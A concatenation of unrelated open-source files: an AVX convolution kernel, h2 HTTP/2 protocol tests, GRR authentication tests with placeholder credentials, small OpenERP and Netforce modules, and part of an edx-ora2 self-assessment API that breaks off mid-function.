                    CMP(reg_mr, m + 1)
                    JE(load_inputs.end)

        # Store vectors to different channels of the output image
        with Block() as store_outputs:
            for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
                VMOVUPS([reg_output], ymm_output)
                ADD(reg_output, YMMRegister.size)

                if n + 1 != nr:
                    CMP(reg_nr, n + 1)
                    JE(store_outputs.end)

        SUB(reg_image_size, YMMRegister.size)
        JAE(main_loop.begin)

    ADD(reg_image_size, YMMRegister.size)
    JZ(final_block.end)

    with final_block:
        # Per-lane mask for the remaining (< 8) pixels, as in the fixed-tile
        # kernel above.
        reg_mask, ymm_mask = GeneralPurposeRegister64(), YMMRegister()
        LEA(reg_mask, Constant.uint32x16(*([0xFFFFFFFF] * 8 + [0x00000000] * 8)))
        SUB(reg_mask, reg_image_size)
        VMOVDQU(ymm_mask, [reg_mask + YMMRegister.size])

        # Load vectors from different channels of the output image
        ymm_outputs = [YMMRegister() for n in range(nr)]
        with Block() as load_outputs:
            for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
                VMASKMOVPS(ymm_output, ymm_mask, [reg_output])

                if n + 1 != nr:
                    CMP(reg_nr, n + 1)
                    JE(load_outputs.end)

        with Block() as load_inputs:
            for m, (ymm_input, reg_input) in enumerate(zip(ymm_inputs, reg_inputs)):
                # Load vector for a channel of the input image
                VMASKMOVPS(ymm_inputs[m], ymm_mask, [reg_input])

                # Update all outputs using the input and corresponding kernel elements
                for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
                    VFMADD231PS(ymm_output, ymm_kernel[m][n], ymm_inputs[m])

                if m + 1 != mr:
                    CMP(reg_mr, m + 1)
                    JE(load_inputs.end)

        # Store vectors to different channels of the output image
        with Block() as store_outputs:
            for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
                VMASKMOVPS([reg_output], ymm_mask, ymm_output)

                if n + 1 != nr:
                    CMP(reg_nr, n + 1)
                    JE(store_outputs.end)

    RETURN()
| bsd-2-clause |
Acidburn0zzz/servo | tests/wpt/web-platform-tests/tools/third_party/h2/test/test_complex_logic.py | 39 | 21420 | # -*- coding: utf-8 -*-
"""
test_complex_logic
~~~~~~~~~~~~~~~~
More complex tests that try to do more.
Certain tests don't really eliminate incorrect behaviour unless they do quite
a bit. These tests should live here, to keep the pain in once place rather than
hide it in the other parts of the test suite.
"""
import pytest
import h2
import h2.config
import h2.connection
class TestComplexClient(object):
    """
    Complex tests for client-side stacks.
    """
    example_request_headers = [
        (':authority', 'example.com'),
        (':path', '/'),
        (':scheme', 'https'),
        (':method', 'GET'),
    ]
    example_response_headers = [
        (':status', '200'),
        ('server', 'fake-serv/0.1.0')
    ]

    def test_correctly_count_server_streams(self, frame_factory):
        """
        We correctly count the number of server streams, both inbound and
        outbound.
        """
        # This test makes no sense unless you do both inbound and outbound,
        # because it's important to confirm that we count them correctly.
        c = h2.connection.H2Connection()
        c.initiate_connection()
        expected_inbound_streams = expected_outbound_streams = 0

        assert c.open_inbound_streams == expected_inbound_streams
        assert c.open_outbound_streams == expected_outbound_streams

        # Open seven client-initiated (odd-numbered) streams, pairing each
        # with a server push on the following even stream ID.
        for stream_id in range(1, 15, 2):
            # Open an outbound stream
            c.send_headers(stream_id, self.example_request_headers)
            expected_outbound_streams += 1
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

            # Receive a pushed stream (to create an inbound one). This doesn't
            # open until we also receive headers.
            f = frame_factory.build_push_promise_frame(
                stream_id=stream_id,
                promised_stream_id=stream_id+1,
                headers=self.example_request_headers,
            )
            c.receive_data(f.serialize())
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

            # The pushed stream only counts as open once its response
            # headers arrive.
            f = frame_factory.build_headers_frame(
                stream_id=stream_id+1,
                headers=self.example_response_headers,
            )
            c.receive_data(f.serialize())
            expected_inbound_streams += 1
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

        # Now close the streams again, in reverse order, checking the
        # counters after each half-close and full close.
        for stream_id in range(13, 0, -2):
            # Close an outbound stream.
            c.end_stream(stream_id)

            # Stream doesn't close until both sides close it.
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

            f = frame_factory.build_headers_frame(
                stream_id=stream_id,
                headers=self.example_response_headers,
                flags=['END_STREAM'],
            )
            c.receive_data(f.serialize())
            expected_outbound_streams -= 1
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

            # Pushed streams can only be closed remotely.
            f = frame_factory.build_data_frame(
                stream_id=stream_id+1,
                data=b'the content',
                flags=['END_STREAM'],
            )
            c.receive_data(f.serialize())
            expected_inbound_streams -= 1
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

        assert c.open_inbound_streams == 0
        assert c.open_outbound_streams == 0
class TestComplexServer(object):
    """
    Complex tests for server-side stacks.
    """
    example_request_headers = [
        (b':authority', b'example.com'),
        (b':path', b'/'),
        (b':scheme', b'https'),
        (b':method', b'GET'),
    ]
    example_response_headers = [
        (b':status', b'200'),
        (b'server', b'fake-serv/0.1.0')
    ]
    server_config = h2.config.H2Configuration(client_side=False)

    def test_correctly_count_server_streams(self, frame_factory):
        """
        We correctly count the number of server streams, both inbound and
        outbound.
        """
        # This test makes no sense unless you do both inbound and outbound,
        # because it's important to confirm that we count them correctly.
        c = h2.connection.H2Connection(config=self.server_config)
        c.receive_data(frame_factory.preamble())
        expected_inbound_streams = expected_outbound_streams = 0

        assert c.open_inbound_streams == expected_inbound_streams
        assert c.open_outbound_streams == expected_outbound_streams

        # Accept seven client-initiated (odd-numbered) streams, pushing a
        # server stream on the following even ID for each.
        for stream_id in range(1, 15, 2):
            # Receive an inbound stream.
            f = frame_factory.build_headers_frame(
                headers=self.example_request_headers,
                stream_id=stream_id,
            )
            c.receive_data(f.serialize())
            expected_inbound_streams += 1
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

            # Push a stream (to create a outbound one). This doesn't open
            # until we send our response headers.
            c.push_stream(stream_id, stream_id+1, self.example_request_headers)
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

            c.send_headers(stream_id+1, self.example_response_headers)
            expected_outbound_streams += 1
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

        # Close the streams again in reverse order, checking the counters
        # after each half-close and full close.
        for stream_id in range(13, 0, -2):
            # Close an inbound stream.
            f = frame_factory.build_data_frame(
                data=b'',
                flags=['END_STREAM'],
                stream_id=stream_id,
            )
            c.receive_data(f.serialize())

            # Stream doesn't close until both sides close it.
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

            c.send_data(stream_id, b'', end_stream=True)
            expected_inbound_streams -= 1
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

            # Pushed streams, however, we can close ourselves.
            c.send_data(
                stream_id=stream_id+1,
                data=b'',
                end_stream=True,
            )
            expected_outbound_streams -= 1
            assert c.open_inbound_streams == expected_inbound_streams
            assert c.open_outbound_streams == expected_outbound_streams

        assert c.open_inbound_streams == 0
        assert c.open_outbound_streams == 0
class TestContinuationFrames(object):
"""
Tests for the relatively complex CONTINUATION frame logic.
"""
example_request_headers = [
(b':authority', b'example.com'),
(b':path', b'/'),
(b':scheme', b'https'),
(b':method', b'GET'),
]
server_config = h2.config.H2Configuration(client_side=False)
def _build_continuation_sequence(self, headers, block_size, frame_factory):
f = frame_factory.build_headers_frame(headers)
header_data = f.data
chunks = [
header_data[x:x+block_size]
for x in range(0, len(header_data), block_size)
]
f.data = chunks.pop(0)
frames = [
frame_factory.build_continuation_frame(c) for c in chunks
]
f.flags = {'END_STREAM'}
frames[-1].flags.add('END_HEADERS')
frames.insert(0, f)
return frames
def test_continuation_frame_basic(self, frame_factory):
"""
Test that we correctly decode a header block split across continuation
frames.
"""
c = h2.connection.H2Connection(config=self.server_config)
c.initiate_connection()
c.receive_data(frame_factory.preamble())
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=5,
frame_factory=frame_factory,
)
data = b''.join(f.serialize() for f in frames)
events = c.receive_data(data)
assert len(events) == 2
first_event, second_event = events
assert isinstance(first_event, h2.events.RequestReceived)
assert first_event.headers == self.example_request_headers
assert first_event.stream_id == 1
assert isinstance(second_event, h2.events.StreamEnded)
assert second_event.stream_id == 1
@pytest.mark.parametrize('stream_id', [3, 1])
def test_continuation_cannot_interleave_headers(self,
frame_factory,
stream_id):
"""
We cannot interleave a new headers block with a CONTINUATION sequence.
"""
c = h2.connection.H2Connection(config=self.server_config)
c.initiate_connection()
c.receive_data(frame_factory.preamble())
c.clear_outbound_data_buffer()
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=5,
frame_factory=frame_factory,
)
assert len(frames) > 2 # This is mostly defensive.
bogus_frame = frame_factory.build_headers_frame(
headers=self.example_request_headers,
stream_id=stream_id,
flags=['END_STREAM'],
)
frames.insert(len(frames) - 2, bogus_frame)
data = b''.join(f.serialize() for f in frames)
with pytest.raises(h2.exceptions.ProtocolError) as e:
c.receive_data(data)
assert "invalid frame" in str(e.value).lower()
def test_continuation_cannot_interleave_data(self, frame_factory):
    """
    We cannot interleave a data frame with a CONTINUATION sequence.
    """
    c = h2.connection.H2Connection(config=self.server_config)
    c.initiate_connection()
    c.receive_data(frame_factory.preamble())
    c.clear_outbound_data_buffer()
    frames = self._build_continuation_sequence(
        headers=self.example_request_headers,
        block_size=5,
        frame_factory=frame_factory,
    )
    assert len(frames) > 2  # This is mostly defensive.
    # Even a DATA frame on the same stream is illegal mid-sequence.
    bogus_frame = frame_factory.build_data_frame(
        data=b'hello',
        stream_id=1,
    )
    frames.insert(len(frames) - 2, bogus_frame)
    data = b''.join(f.serialize() for f in frames)
    with pytest.raises(h2.exceptions.ProtocolError) as e:
        c.receive_data(data)
    assert "invalid frame" in str(e.value).lower()
def test_continuation_cannot_interleave_unknown_frame(self, frame_factory):
    """
    We cannot interleave an unknown frame with a CONTINUATION sequence.
    """
    c = h2.connection.H2Connection(config=self.server_config)
    c.initiate_connection()
    c.receive_data(frame_factory.preamble())
    c.clear_outbound_data_buffer()
    frames = self._build_continuation_sequence(
        headers=self.example_request_headers,
        block_size=5,
        frame_factory=frame_factory,
    )
    assert len(frames) > 2  # This is mostly defensive.
    bogus_frame = frame_factory.build_data_frame(
        data=b'hello',
        stream_id=1,
    )
    # 88 is not a registered HTTP/2 frame type, turning this DATA frame
    # into an "unknown" frame on the wire.
    bogus_frame.type = 88
    frames.insert(len(frames) - 2, bogus_frame)
    data = b''.join(f.serialize() for f in frames)
    with pytest.raises(h2.exceptions.ProtocolError) as e:
        c.receive_data(data)
    assert "invalid frame" in str(e.value).lower()
def test_continuation_frame_multiple_blocks(self, frame_factory):
    """
    Test that we correctly decode several header blocks split across
    continuation frames.
    """
    c = h2.connection.H2Connection(config=self.server_config)
    c.initiate_connection()
    c.receive_data(frame_factory.preamble())
    # Client-initiated streams use odd stream IDs: 1, 3, 5.
    for stream_id in range(1, 7, 2):
        frames = self._build_continuation_sequence(
            headers=self.example_request_headers,
            block_size=2,
            frame_factory=frame_factory,
        )
        # The helper always targets stream 1; retarget every frame.
        for frame in frames:
            frame.stream_id = stream_id
        data = b''.join(f.serialize() for f in frames)
        events = c.receive_data(data)
        assert len(events) == 2
        first_event, second_event = events
        assert isinstance(first_event, h2.events.RequestReceived)
        assert first_event.headers == self.example_request_headers
        assert first_event.stream_id == stream_id
        assert isinstance(second_event, h2.events.StreamEnded)
        assert second_event.stream_id == stream_id
class TestContinuationFramesPushPromise(object):
    """
    Tests for the relatively complex CONTINUATION frame logic working with
    PUSH_PROMISE frames.
    """
    # Request headers carried by the pushed request (PUSH_PROMISE payload).
    example_request_headers = [
        (b':authority', b'example.com'),
        (b':path', b'/'),
        (b':scheme', b'https'),
        (b':method', b'GET'),
    ]
    # Response headers used where a HEADERS frame must be interleaved.
    example_response_headers = [
        (b':status', b'200'),
        (b'server', b'fake-serv/0.1.0')
    ]
def _build_continuation_sequence(self, headers, block_size, frame_factory):
f = frame_factory.build_push_promise_frame(
stream_id=1, promised_stream_id=2, headers=headers
)
header_data = f.data
chunks = [
header_data[x:x+block_size]
for x in range(0, len(header_data), block_size)
]
f.data = chunks.pop(0)
frames = [
frame_factory.build_continuation_frame(c) for c in chunks
]
f.flags = {'END_STREAM'}
frames[-1].flags.add('END_HEADERS')
frames.insert(0, f)
return frames
def test_continuation_frame_basic_push_promise(self, frame_factory):
    """
    Test that we correctly decode a header block split across continuation
    frames when that header block is initiated with a PUSH_PROMISE.
    """
    # Client-side connection: stream 1 must be open for the server to
    # push against it.
    c = h2.connection.H2Connection()
    c.initiate_connection()
    c.send_headers(stream_id=1, headers=self.example_request_headers)
    frames = self._build_continuation_sequence(
        headers=self.example_request_headers,
        block_size=5,
        frame_factory=frame_factory,
    )
    data = b''.join(f.serialize() for f in frames)
    events = c.receive_data(data)
    assert len(events) == 1
    event = events[0]
    assert isinstance(event, h2.events.PushedStreamReceived)
    assert event.headers == self.example_request_headers
    assert event.parent_stream_id == 1
    assert event.pushed_stream_id == 2
@pytest.mark.parametrize('stream_id', [3, 1, 2])
def test_continuation_cannot_interleave_headers_pp(self,
                                                   frame_factory,
                                                   stream_id):
    """
    We cannot interleave a new headers block with a CONTINUATION sequence
    when the headers block is based on a PUSH_PROMISE frame.
    """
    c = h2.connection.H2Connection()
    c.initiate_connection()
    c.send_headers(stream_id=1, headers=self.example_request_headers)
    frames = self._build_continuation_sequence(
        headers=self.example_request_headers,
        block_size=5,
        frame_factory=frame_factory,
    )
    assert len(frames) > 2  # This is mostly defensive.
    # Inject a HEADERS frame before the final CONTINUATION frame.
    bogus_frame = frame_factory.build_headers_frame(
        headers=self.example_response_headers,
        stream_id=stream_id,
        flags=['END_STREAM'],
    )
    frames.insert(len(frames) - 2, bogus_frame)
    data = b''.join(f.serialize() for f in frames)
    with pytest.raises(h2.exceptions.ProtocolError) as e:
        c.receive_data(data)
    assert "invalid frame" in str(e.value).lower()
def test_continuation_cannot_interleave_data(self, frame_factory):
    """
    We cannot interleave a data frame with a CONTINUATION sequence when
    that sequence began with a PUSH_PROMISE frame.
    """
    c = h2.connection.H2Connection()
    c.initiate_connection()
    c.send_headers(stream_id=1, headers=self.example_request_headers)
    frames = self._build_continuation_sequence(
        headers=self.example_request_headers,
        block_size=5,
        frame_factory=frame_factory,
    )
    assert len(frames) > 2  # This is mostly defensive.
    # A DATA frame on the parent stream is illegal mid-sequence.
    bogus_frame = frame_factory.build_data_frame(
        data=b'hello',
        stream_id=1,
    )
    frames.insert(len(frames) - 2, bogus_frame)
    data = b''.join(f.serialize() for f in frames)
    with pytest.raises(h2.exceptions.ProtocolError) as e:
        c.receive_data(data)
    assert "invalid frame" in str(e.value).lower()
def test_continuation_cannot_interleave_unknown_frame(self, frame_factory):
    """
    We cannot interleave an unknown frame with a CONTINUATION sequence when
    that sequence began with a PUSH_PROMISE frame.
    """
    c = h2.connection.H2Connection()
    c.initiate_connection()
    c.send_headers(stream_id=1, headers=self.example_request_headers)
    frames = self._build_continuation_sequence(
        headers=self.example_request_headers,
        block_size=5,
        frame_factory=frame_factory,
    )
    assert len(frames) > 2  # This is mostly defensive.
    bogus_frame = frame_factory.build_data_frame(
        data=b'hello',
        stream_id=1,
    )
    # 88 is not a registered HTTP/2 frame type, making this an "unknown"
    # frame on the wire.
    bogus_frame.type = 88
    frames.insert(len(frames) - 2, bogus_frame)
    data = b''.join(f.serialize() for f in frames)
    with pytest.raises(h2.exceptions.ProtocolError) as e:
        c.receive_data(data)
    assert "invalid frame" in str(e.value).lower()
@pytest.mark.parametrize('evict', [True, False])
def test_stream_remotely_closed_disallows_push_promise(self,
                                                       evict,
                                                       frame_factory):
    """
    Streams closed normally by the remote peer disallow PUSH_PROMISE
    frames, and cause a GOAWAY.
    """
    c = h2.connection.H2Connection()
    c.initiate_connection()
    c.send_headers(
        stream_id=1,
        headers=self.example_request_headers,
        end_stream=True
    )
    # The remote peer ends the stream too: stream 1 is now fully closed.
    f = frame_factory.build_headers_frame(
        stream_id=1,
        headers=self.example_response_headers,
        flags=['END_STREAM']
    )
    c.receive_data(f.serialize())
    c.clear_outbound_data_buffer()
    if evict:
        # This is annoyingly stateful, but enumerating the list of open
        # streams will force us to flush state.
        assert not c.open_outbound_streams
    f = frame_factory.build_push_promise_frame(
        stream_id=1,
        promised_stream_id=2,
        headers=self.example_request_headers,
    )
    with pytest.raises(h2.exceptions.ProtocolError):
        c.receive_data(f.serialize())
    # The connection must answer with GOAWAY(PROTOCOL_ERROR).
    f = frame_factory.build_goaway_frame(
        last_stream_id=0,
        error_code=h2.errors.ErrorCodes.PROTOCOL_ERROR,
    )
    assert c.data_to_send() == f.serialize()
def test_continuation_frame_multiple_push_promise(self, frame_factory):
    """
    Test that we correctly decode header blocks split across continuation
    frames when those header blocks are initiated with a PUSH_PROMISE, for
    more than one pushed stream.
    """
    c = h2.connection.H2Connection()
    c.initiate_connection()
    c.send_headers(stream_id=1, headers=self.example_request_headers)
    # Server-pushed streams use even IDs: 2, 4, 6.
    for promised_stream_id in range(2, 8, 2):
        frames = self._build_continuation_sequence(
            headers=self.example_request_headers,
            block_size=2,
            frame_factory=frame_factory,
        )
        # The helper hard-codes promised stream 2; retarget the
        # PUSH_PROMISE frame for this iteration.
        frames[0].promised_stream_id = promised_stream_id
        data = b''.join(f.serialize() for f in frames)
        events = c.receive_data(data)
        assert len(events) == 1
        event = events[0]
        assert isinstance(event, h2.events.PushedStreamReceived)
        assert event.headers == self.example_request_headers
        assert event.parent_stream_id == 1
        assert event.pushed_stream_id == promised_stream_id
| mpl-2.0 |
cfg2015/EPT-2015-2 | addons/project_issue/report/__init__.py | 442 | 1084 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import project_issue_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ojengwa/grr | server/data_server/auth_test.py | 5 | 4768 | #!/usr/bin/env python
"""Test the authentication facilities of the data servers."""
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import test_lib
from grr.lib import utils
from grr.server.data_server import auth
class AuthTest(test_lib.GRRBaseTest):
"""Tests the authentication package of the data server."""
def setUp(self):
  """Point the data-server config at a fixed user/password pair for tests."""
  super(AuthTest, self).setUp()
  config_lib.CONFIG.Set("Dataserver.server_username", "rootuser1")
  config_lib.CONFIG.Set("Dataserver.server_password", "somelongpasswordaabb")
  config_lib.CONFIG.Set("Dataserver.client_credentials",
                        ["rootuser1:somelongpasswordaabb:rw"])
def testNonceStoreSimple(self):
  # Test creation and deletion of nonces.
  store = auth.NonceStore()
  nonce1 = store.NewNonce()
  self.assertNotEqual(nonce1, None)
  # GetNonce consumes the nonce, so the second lookup must return None.
  self.assertEqual(nonce1, store.GetNonce(nonce1))
  self.assertEqual(None, store.GetNonce(nonce1))
  # Check if new nonce is not equal to the previous one.
  nonce2 = store.NewNonce()
  self.assertNotEqual(nonce2, None)
  self.assertNotEqual(nonce1, nonce2)
  self.assertEqual(nonce2, store.GetNonce(nonce2))
  self.assertEqual(None, store.GetNonce(nonce2))
def testNonceStoreInvalidateOldNonces(self):
  # Shrink the lease and the store limit so expiry is easy to trigger
  # deterministically with FakeTime.
  with utils.MultiStubber((auth.NonceStore, "NONCE_LEASE", 1),
                          (auth.NonceStore, "MAX_NONCES", 5)):
    store = auth.NonceStore()
    now = 1000000
    with test_lib.FakeTime(now):
      # Add a few nonces first.
      nonces = []
      for _ in xrange(0, 5):
        nonces.append(store.NewNonce())
    with test_lib.FakeTime(now + 2):
      # Two seconds have passed, therefore old nonces will disappear.
      nonce = store.NewNonce()
      self.assertEqual(nonce, store.GetNonce(nonce))
      for nonce in nonces:
        self.assertEqual(store.GetNonce(nonce), None)
def testNonceStoreTooMany(self):
  with utils.Stubber(auth.NonceStore, "MAX_NONCES", 5):
    # Attempt to get a lot of nonces at once.
    store = auth.NonceStore()
    old_nonce = None
    for _ in xrange(0, auth.NonceStore.MAX_NONCES):
      old_nonce = store.NewNonce()
    self.assertNotEqual(old_nonce, None)
    # We cannot get any nonce now!
    nonce1 = store.NewNonce()
    self.assertEqual(nonce1, None)
    # If we remove one nonce, then we should be able to get a new one.
    self.assertEqual(old_nonce, store.GetNonce(old_nonce))
    nonce1 = store.NewNonce()
    self.assertEqual(nonce1, store.GetNonce(nonce1))
def testServerCredentials(self):
  user = config_lib.CONFIG["Dataserver.server_username"]
  pwd = config_lib.CONFIG["Dataserver.server_password"]
  # Use correct credentials.
  store = auth.NonceStore()
  nonce = store.NewNonce()
  token = auth.NonceStore.GenerateAuthToken(nonce, user, pwd)
  # Credentials must validate.
  self.assertTrue(store.ValidateAuthTokenServer(token))
  # Validation consumes the nonce.
  self.assertEqual(store.GetNonce(nonce), None)
  # Use bad password.
  nonce = store.NewNonce()
  token = auth.NonceStore.GenerateAuthToken(nonce, user, "badpassword")
  # Credentials must fail.
  self.assertFalse(store.ValidateAuthTokenServer(token))
  self.assertEqual(store.GetNonce(nonce), None)
  # Use bad nonce (correct length, but never issued by the store).
  token = auth.NonceStore.GenerateAuthToken("x" * auth.NONCE_SIZE, user, pwd)
  self.assertFalse(store.ValidateAuthTokenServer(token))
def testClientCredentials(self):
  user = config_lib.CONFIG["Dataserver.server_username"]
  pwd = config_lib.CONFIG["Dataserver.server_password"]
  # Check credentials loaded from the config set up in setUp().
  creds = auth.ClientCredentials()
  creds.InitializeFromConfig()
  self.assertTrue(creds.HasUser(user))
  self.assertEqual(creds.GetPassword(user), "somelongpasswordaabb")
  self.assertEqual(creds.GetPermissions(user), "rw")
  self.assertFalse(creds.HasUser("user2"))
  self.assertEqual(creds.GetPassword("user2"), None)
  # Encrypt credentials.
  cipher = creds.Encrypt(user, pwd)
  self.assertNotEqual(cipher, "")
  creds2 = auth.ClientCredentials()
  self.assertEqual(creds2.InitializeFromEncryption(cipher, user, pwd),
                   creds2)
  # Must have same credentials after the encrypt/decrypt round trip.
  self.assertTrue(creds2.HasUser(user))
  self.assertEqual(creds2.GetPassword(user), "somelongpasswordaabb")
  self.assertEqual(creds2.GetPermissions(user), "rw")
  # Create new credentials with wrong password; decryption must fail and
  # leave the object empty.
  creds3 = auth.ClientCredentials()
  self.assertEqual(creds3.InitializeFromEncryption(cipher, user,
                                                   "badpassword"), None)
  self.assertFalse(creds3.HasUser(user))
def main(args):
  # Delegate to the GRR test runner.
  test_lib.main(args)


if __name__ == "__main__":
  flags.StartMain(main)
| apache-2.0 |
sidzan/netforce | netforce_product/netforce_product/models/product_attribute_value.py | 4 | 1579 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce.model import Model, fields
class AttributeValue(Model):
    """Value of a product attribute for a specific product (link table)."""
    _name = "product.attribute.value"
    _fields = {
        # Cascade delete: attribute values disappear with their product.
        "product_id": fields.Many2One("product", "Product", required=True, on_delete="cascade"),
        "attribute_id": fields.Many2One("product.attribute", "Attribute", required=True),
        "value": fields.Char("Value"),  # Deprecated: superseded by option_id
        "option_id": fields.Many2One("product.attribute.option", "Value"),
    }

AttributeValue.register()
| mit |
GbalsaC/bitnamiP | edx-ora2/openassessment/assessment/api/self.py | 6 | 12139 | """
Public interface for self-assessment.
"""
import logging
from django.db import DatabaseError, transaction
from dogapi import dog_stats_api
from submissions.api import get_submission_and_student, SubmissionNotFoundError
from openassessment.assessment.serializers import (
InvalidRubric, full_assessment_dict, rubric_from_dict, serialize_assessments
)
from openassessment.assessment.models import (
Assessment, AssessmentPart, InvalidRubricSelection
)
from openassessment.assessment.errors import (
SelfAssessmentRequestError, SelfAssessmentInternalError
)
# Assessments are tagged as "self-evaluation"
SELF_TYPE = "SE"
logger = logging.getLogger("openassessment.assessment.api.self")
def submitter_is_finished(submission_uuid, requirements):
    """
    Check whether a self-assessment has been completed for a submission.

    Args:
        submission_uuid (str): The unique identifier of the submission.
        requirements (dict): Any attributes of the assessment module required
            to determine if this assessment is complete. There are currently
            no requirements for a self-assessment.

    Returns:
        True if the submitter has assessed their answer

    Examples:
        >>> submitter_is_finished('222bdf3d-a88e-11e3-859e-040ccee02800', {})
        True
    """
    # A single self-assessment row for this submission marks completion.
    return Assessment.objects.filter(
        score_type=SELF_TYPE, submission_uuid=submission_uuid
    ).exists()
def assessment_is_finished(submission_uuid, requirements):
    """
    Check whether a self-assessment has been completed. For self-assessment,
    this function is synonymous with submitter_is_finished.

    Args:
        submission_uuid (str): The unique identifier of the submission.
        requirements (dict): Any attributes of the assessment module required
            to determine if this assessment is complete. There are currently
            no requirements for a self-assessment.

    Returns:
        True if the assessment is complete.

    Examples:
        >>> assessment_is_finished('222bdf3d-a88e-11e3-859e-040ccee02800', {})
        True
    """
    # The submitter is the only assessor, so "submitted" == "assessed".
    return submitter_is_finished(submission_uuid, requirements)
def get_score(submission_uuid, requirements):
    """
    Get the score for this particular assessment.

    Args:
        submission_uuid (str): The unique identifier for the submission
        requirements (dict): Not used.

    Returns:
        A dict of points earned and points possible for the given submission.
        Returns None if no score can be determined yet.

    Examples:
        >>> get_score('222bdf3d-a88e-11e3-859e-040ccee02800', {})
        {
            'points_earned': 5,
            'points_possible': 10
        }
    """
    latest_assessment = get_assessment(submission_uuid)
    if latest_assessment:
        return {
            "points_earned": latest_assessment["points_earned"],
            "points_possible": latest_assessment["points_possible"],
        }
    return None
def create_assessment(
    submission_uuid,
    user_id,
    options_selected,
    criterion_feedback,
    overall_feedback,
    rubric_dict,
    scored_at=None
):
    """
    Create a self-assessment for a submission.

    Args:
        submission_uuid (str): The unique identifier for the submission being assessed.
        user_id (str): The ID of the user creating the assessment. This must match the ID of the user who made the submission.
        options_selected (dict): Mapping of rubric criterion names to option values selected.
        criterion_feedback (dict): Dictionary mapping criterion names to the
            free-form text feedback the user gave for the criterion.
            Since criterion feedback is optional, some criteria may not appear
            in the dictionary.
        overall_feedback (unicode): Free-form text feedback on the submission overall.
        rubric_dict (dict): Serialized Rubric model.

    Keyword Arguments:
        scored_at (datetime): The timestamp of the assessment; defaults to the current time.

    Returns:
        dict: serialized Assessment model

    Raises:
        SelfAssessmentRequestError: Could not retrieve a submission that the user is allowed to score.
    """
    # Check that there are not any assessments for this submission
    if Assessment.objects.filter(submission_uuid=submission_uuid, score_type=SELF_TYPE).exists():
        msg = (
            u"Cannot submit a self-assessment for the submission {uuid} "
            "because another self-assessment already exists for that submission."
        ).format(uuid=submission_uuid)
        raise SelfAssessmentRequestError(msg)

    # Check that the student is allowed to assess this submission
    try:
        submission = get_submission_and_student(submission_uuid)
        if submission['student_item']['student_id'] != user_id:
            msg = (
                u"Cannot submit a self-assessment for the submission {uuid} "
                u"because it was created by another student "
                u"(submission student ID {student_id} does not match your "
                u"student id {other_id})"
            ).format(
                uuid=submission_uuid,
                student_id=submission['student_item']['student_id'],
                other_id=user_id
            )
            raise SelfAssessmentRequestError(msg)
    except SubmissionNotFoundError:
        msg = (
            "Could not submit a self-assessment because no submission "
            "exists with UUID {uuid}"
        ).format(uuid=submission_uuid)
        # Bug fix: the message was built but previously dropped
        # (`raise SelfAssessmentRequestError()`); pass it through so callers
        # can see why the request failed.
        raise SelfAssessmentRequestError(msg)

    try:
        # Create the assessment and its parts atomically; see
        # _complete_assessment for the transaction boundary.
        assessment = _complete_assessment(
            submission_uuid,
            user_id,
            options_selected,
            criterion_feedback,
            overall_feedback,
            rubric_dict,
            scored_at
        )
        _log_assessment(assessment, submission)
    except InvalidRubric as ex:
        msg = "Invalid rubric definition: " + str(ex)
        logger.warning(msg, exc_info=True)
        raise SelfAssessmentRequestError(msg)
    except InvalidRubricSelection as ex:
        msg = "Selected options do not match the rubric: " + str(ex)
        logger.warning(msg, exc_info=True)
        raise SelfAssessmentRequestError(msg)
    except DatabaseError:
        error_message = (
            u"Error creating self assessment for submission {}"
